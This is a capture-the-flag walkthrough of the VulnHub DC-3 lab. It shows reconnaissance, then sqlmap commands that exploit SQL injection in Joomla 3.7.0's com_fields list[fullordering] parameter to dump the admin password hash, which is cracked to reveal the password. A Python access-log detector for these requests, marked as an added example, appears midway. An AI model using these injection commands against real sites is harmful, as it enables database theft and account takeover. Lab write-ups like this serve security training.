vulnhub DC-3

DC-3

1. Information gathering

Run arp-scan -l to list the hosts on the same network segment

The target machine is found

ip:192.168.3.159

tar@kali:~$ nmap -A 192.168.3.159 -p 1-65535
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 20:04 CST
Nmap scan report for 192.168.3.147
Host is up (0.0022s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home

Summary

CMS: Joomla
ip: 192.168.3.159
Port: 80

2. Searching for vulnerabilities

joomscan

Reference: http://www.52bug.cn/hacktool/5336.html

joomscan -u 192.168.3.159
Processing http://192.168.3.159 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0                                                       
                                                                        
[+] Core Joomla Vulnerability                                           
[++] Target Joomla core is not vulnerable                               
                                                                        
[+] Checking Directory Listing                                          
[++] directory has directory listing :                                  
http://192.168.3.159/administrator/components                           
http://192.168.3.159/administrator/modules                              
http://192.168.3.159/administrator/templates                            
http://192.168.3.159/images/banners                                     
                                                                        
                                                                        
[+] Checking apache info/status files                                   
[++] Readable info/status files are not found                           
                                                                        
[+] admin finder                                                        
[++] Admin page : http://192.168.3.159/administrator/                   
                                                                        
[+] Checking robots.txt existing                                        
[++] robots.txt is not found                                            
                                                                        
[+] Finding common backup files name                                    
[++] Backup files are not found                                         
                                                                        
[+] Finding common log files name                                       
[++] error log is not found                                             
                                                                        
[+] Checking sensitive config.php.x file                                
[++] Readable config files are not found                                
                                                                                                                          
Your Report : reports/192.168.3.159/  

Version: Joomla 3.7.0 (a Baidu search for this version shows that it has a SQL injection vulnerability)

https://www.anquanke.com/post/id/86119

Admin login: http://192.168.3.159/administrator/

The searchsploit tool

searchsploit Joomla 3.7.0

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla_sql.txt

Save the vulnerability details to a local file

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

This retrieves the databases

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

-D "joomladb" -T "#__users" --columns retrieves the column names in #__users

-D "joomladb" -T "#__users" -C "name,password" --dump dumps the fields

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

+-------+--------------------------------------------------------------+
| name  | password                                                     |
+-------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-------+--------------------------------------------------------------+
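
Seen from the server side, every sqlmap request above hits com_fields with a list[fullordering] value that is not a normal sort order. The following detector is an added example, not part of the original post: it scans Apache access-log lines for such requests. It assumes the "combined" log format and that legitimate ordering values look like "a.title ASC"; it keys on the parameter value because --random-agent makes the User-Agent useless as a signal.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" log lines (sample data, not from the original post).
SAMPLE_LOG = """\
192.168.3.10 - - [07/Nov/2020:20:31:02 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.title%20ASC HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.3.20 - - [07/Nov/2020:20:31:05 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 1840 "-" "Mozilla/5.0"
192.168.3.20 - - [07/Nov/2020:20:31:06 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%28PLACEHOLDER%29 HTTP/1.1" 500 1840 "-" "Opera/9.80"
192.168.3.10 - - [07/Nov/2020:20:31:09 +0800] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 7301 "-" "Mozilla/5.0"
192.168.3.20 - - [07/Nov/2020:20:31:11 +0800] "GET /administrator/ HTTP/1.1" 200 4410 "-" "Opera/9.80"
"""

# Captures: client IP, request target, status code.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
# Assumption: a legitimate ordering value is "alias.column ASC|DESC", e.g. "a.title ASC".
SAFE_ORDERING = re.compile(r"^[a-z]+\.[a-z_]+ (asc|desc)$", re.IGNORECASE)


def suspicious_requests(log_text):
    """Return (client_ip, status, decoded_value) for every com_fields request
    whose list[fullordering] value is not a plain sort order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # parse_qs percent-decodes keys and values, so list%5Bfullordering%5D
        # and list[fullordering] are treated as the same parameter.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_fields" not in params.get("option", []):
            continue
        for value in params.get("list[fullordering]", []):
            if not SAFE_ORDERING.match(value):
                hits.append((ip, status, value))
    return hits


def hits_per_client(hits):
    """Count flagged requests per client IP; a burst from one address is enumeration."""
    return Counter(ip for ip, _, _ in hits)


if __name__ == "__main__":
    found = suspicious_requests(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(dict(hits_per_client(found)))
```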

Cracking the hash with John: https://blog.csdn.net/boy_from_village/article/details/80383419

password:snoopy

Admin login succeeded
